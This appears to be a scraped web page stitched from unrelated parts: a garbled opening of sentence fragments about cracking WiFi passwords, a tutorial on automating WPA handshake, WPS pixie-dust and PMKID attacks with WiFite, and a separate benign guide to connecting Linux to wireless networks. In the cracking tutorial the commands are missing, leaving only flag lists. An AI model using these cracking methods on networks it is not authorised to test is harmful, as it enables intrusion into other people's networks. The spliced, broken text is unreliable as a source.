I have a Linux Live CD from Ubuntu which I have use on my XP laptop, but I only use it at home as my T23 does not have a WiFi connection. I was looking at using the Live CD in my W7 (X200) when on the road as it has a WiFi connection. I was told by a friend that it is a much more secure way to use a. I want to crack wifi passwords with tools like fern wifi crack but this tool. A kali linux tool to attack wifi passwords by crack them. What wireless.
by hash3liZer . 18 November 2018
In this tutorial, we will automate the wireless cracking process using WiFite. Cracking wireless can exceptionally be tricky when it comes to automation for multiple Access Points. A device like Raspberry Pi could be more compact and helpful in any such cases. Consider a device which can be taken anywhere freely with a binded script in it to check for default/weak wireless passphrases.
WiFite :-
WiFite is an automated WiFi Cracking tool written in Python. It is basically a combination of various famous pentest tools like airmon, aircrack and reaver etc. It is widely used for cracking WEP and WPA (WPS) wireless networks. WiFite version 2 has been released and is likely to be already installed if you are running Kali or Parrot linux distros.
However, since i want this tutorial to be followed by the users of Raspberry Pi and Ubuntu as well, we will make a head-start installing installing WiFite.
STEP 1
WiFite Installation
The project is available on github: https://github.com/derv82/wifite2
Clone the repository using git:
Now, install some pre-requisities required for PMKID attack:
There are some of the required tools for WiFite to properly run and some others are optional. You can find this list on the link given above. The utilities iwconfig and ifconfig would already be installed. However, if you are running short of aircrack suite, that can be installed easily using apt package manager:
Now, to install WiFite:
This will install WiFite as a normal Linux command by creating a symlink to /usr/bin/ directory. You can verify it by printing the manual:
STEP 2
Monitor mode
You would need you wireless card to be operating in monitor mode which can be done with airmon-ng:
STEP 3
WPA/WPA2 Cracking using handshake
The standard way being used by most of the scripts is to capture a handshake and compute the encoded keys to brute force the actual key. However, lately a new method was discovered which uses PMKID to accomplish the task. To Brute force WPA/WPA2 networks using handshake, run the below command:
Arguments:
- -i: Monitor mode interface to use.
- --random-mac: Randomize the Wireless Adapter MAC address.
- --clients-only: Target networks with stations only.
- --wpa: Target WPA/WPA2 networks only. WPS included.
- --dict: Wordlist to use for cracking MIC hash.
STEP 4
WPS Cracking
WPS protocol was developed to provide user with the ease of connecting to Access Points. Hownever, the protocol is itself vulnerable on a variety of misconfigured routers. WiFite uses pixie dust and WPS Pin attack against WPS networks. To only target wps networks:
Arguments:
- --nodeauths: Do not send deauthentication packets.
- --wps: Only target WPS networks.
- --wps-only: Only use Pin brute force and pixie dust attack.
STEP 5
WPA/WPA2 cracking using PMKID
Lately, a new method was discovered by Jen Steube for cracking WPA/WPA2. The difference in between handshake and PMKID is that handshake requires the whole 4-way handshake to compute the key to be bruteforced. However, with this new trick an attacker make the Access Point transfer the first EAPOL message which contains the key to be bruteforced. PMKID attack requires two more tools. Install hcxtools:
Then install hcxdumptool:
To crack WiFi Networks using pmkid attack:
Arguments:
- --pmkid: Only use PMKID to crack wireless networks.
- --pmkid-timeout: Timeout for first Message to receive.
- --dict: Wordlist with passwords to brute force.
STEP 6
Cracking Networks
To see which networks are cracked, just execute this command:
Conclusion
WiFite is an awesome wireless cracking tool which automates the cracking stuff using other pentest utilities. It can easily be integrated with a compact device like Raspberry pi and could be very useful tool for a number of reasons.
¬â€
If you are a mobile Linux user one of the first things you need to do is to connect that mobile device to a wireless access point. By default, the standard Wi-Fi tools for the Linux desktops are straight-forward and reliable. That of course presumes you are using the standard desktops (GNOME or KDE). But what happens when you opt for a different desktop such as E17 or Fluxbox? Or what if the “default” standards aren’t flexible enough or feature-rich enough for your needs. In those instances you need to take a look at a different toolset for connecting you to a wireless access point.
What are your options? You could go for a GUI or command the command line. I would like to offer options for both GUI and command line with the help of Wifi Radar and
ifconfig
.Assumptions
I will assume that you do have wireless hardware that does work in Linux. If you have found yourself with a wireless card that does not seem to work you might consider installing the latest Ubuntu and enabling the proprietary driver for your device. Most often this will have your wireless working much quicker than trying to go the ndiswrapper route.
I will also assume you have both SSID and the authentication key for your wireless connection, otherwise you probably wouldn’t be attempting to make this connection in the first place, right?
Wifi Radar
For many, Wifi Radar is a Python/PyGTK2 application that offers quite a bit more features and flexibility than the average tool (it will even speak the status of your connection – when connecting or disconnecting – so you know, without looking, if you are connected.) Wifi Radar is easy to install as well as use.
Since Wifi Radar is found in most all default distribution repositories, the installation is as simple as installing any Linux application. Just open up your Add/Remove Software tool and install. Once Wifi Radar is installed you can find it in Applications > Internet. When you start up Wifi Radar it will auto scan for any wireless networks and will display the available access points for you (see Figure 1). To connect to a network just select the network and click Connect and you will be prompted for a password (if the access point is set up to require one).
You can also dig deep within the preferences of WiFi Radar. If you do this, do it with caution. Much of the configurations are commands that are set up to work with the wireless networking system and many of these commands are fairly complex. What options you can safely tinker with are in the General tab. In this tab (see Figure 2) you can set Wifi Radar to auto-detect your wireless device (which is not set by default) and you can also set the Speak option. By default the Speak option uses the
say
command which is buggy at best. Instead, reconfigure this to use the espeak
command. Once you do this the Speak option will work. You will notice that WiFi Radar does not have a system tray icon. Don’t worry – when you close the application you will not be disconnected from your network.
Now let’s take a look at setting up a wireless connection from the command line.
Command Line
Believe it or not, this isn’t as challenging as it might seem. I will demonstrate how this is done on a Ubuntu machine. For other distributions you might have to alter the location of scripts or the name.
What you will need, in order to be able to establish this connection, are the following:
- ifconfig: Enable your wireless device.
- iwlist: List the available wireless access points.
- iwconfig: Configure your wireless connection.
- dhclient: Get your IP Address via dhcp.
- wpa_supplicant: For use with WPA authentication.
Make sure you have all of the above tools on your computer before you continue. To test for this tools you can, from within your terminal window, issue the commands:
which ifconfig
which iwlist
which iwconfig
which dhclient
- which wpa_supplicant
You should see the path where each tool is installed. If you receive an error that a command is not installed you will need to install it. This should not be the case, since these are standard tools that are required for wireless networking.
Let’s take a look at how this is done when you are connecting to a non-WPA authentication-based wireless network.
Now that you have confirmed they are installed start off with the command:
ifconfig wlan0 up
Where
wlan0
is the name of your wireless device (this is most often the default). The above command will bring your wireless device up so it is ready to use. The next phase is to scan for any wireless access points with the command:iwlist wlan0 scan
From the output of the scan you should see a line (or lines) like:
ESSID: 'NETWORK_NAME'
Where NETWORK_NAME is the name of an available wireless network.
Now that you have your network name (and you know it’s available) you can connect to that network with the command:
iwconfig wlan0 essid NETWORK_NAME key WIRELESS_KEY
Where
NETWORK_NAME
is the name of the network you want to connect to and WIRELESS_KEY
is the security key for that network. NOTE: The iwconfig
command defaults to HEX values for wireless keys. If you need to use ascii you have to prepend the “s” prefix to your key like so:iwconfig wlan0 essid NETWORK_NAME key s:WIRELESS_KEY
With your connection made, you now have to get an IP address for your machine using the dhclient command like:
dhclient wlan0
Simplify the Process
Naturally you do not want to have to issue all of those command in order to bring up a wireless network. You can make this a lot easier by creating a script to handle the task. A possible script might look like this:
#! /bin/bash
ifconfig wlan0
iwconfig wlan0 essid NETWORK_NAME key WIRELESS_KEY
dhclient wlan0
Where
NETWORK_NAME
and WIRELESS_KEY
are unique to the network you are connecting to. Save that file with the name wireless_up
and give it executable permissions with the command chmod u+x wireless_up
and you are ready to use that file to bring up your wireless. You can even move that file to /usr/local/bin
so the command is global. All you would have to do to bring up your wireless connection is issue the command wireless_up
and you’re ready to go.WPA
For WPA-based networks you will need to take a different approach. Do the following:
1. Issue the command wpa_passphrase SSID PASSWORD (Where SSID is your network ID and PASSWORD is your wireless password). This will generate a psk string that you will use in the configuration file.
2. Edit the /etc/wpa_supplicant.conf file to reflect:
Network={
  ssid=SSID
  psk=PSK
}
Where SSID is the actual ID of your wireless network and PSK is the string generated by the wpa_passphrase command.
3. Run the wpa_supplicant daemon with the command:
wpa_supplicant -B -i INTERFACE -DWext -c /etc/wpa_supplicant.conf
Where INTERFACE is the name of your wireless interface.
4. Now make sure you are associated with your network with the command iwconfig INTERFACE (Where INTERFACE is the name of your wireless interface).
5. Get an IP address with the command: dhclient INTERFACE (Where INTERFACE is the name of your wireless interface).
You should now be on the wireless network.
You can automate this by creating an entry in /etc/network/interfaces like this:
auto INTERFACE
iface INTERFACE inet dhcp
  pre-up wpa_supplicant -Bw -Dwext -i INTERFACE -c /etc/wpa_supplicant.conf
  post-down killall -q wpa_supplicant
Where INTERFACE is the name of your wireless interface.¬â€
Final thoughts
There are plenty of ways to connect to a wireless network in Linux. So long as your hardware is working, you shouldn’t have a problem finding a tool that will help you get connected. Whether it’s a GUI or command line, Linux has you covered on the wireless front.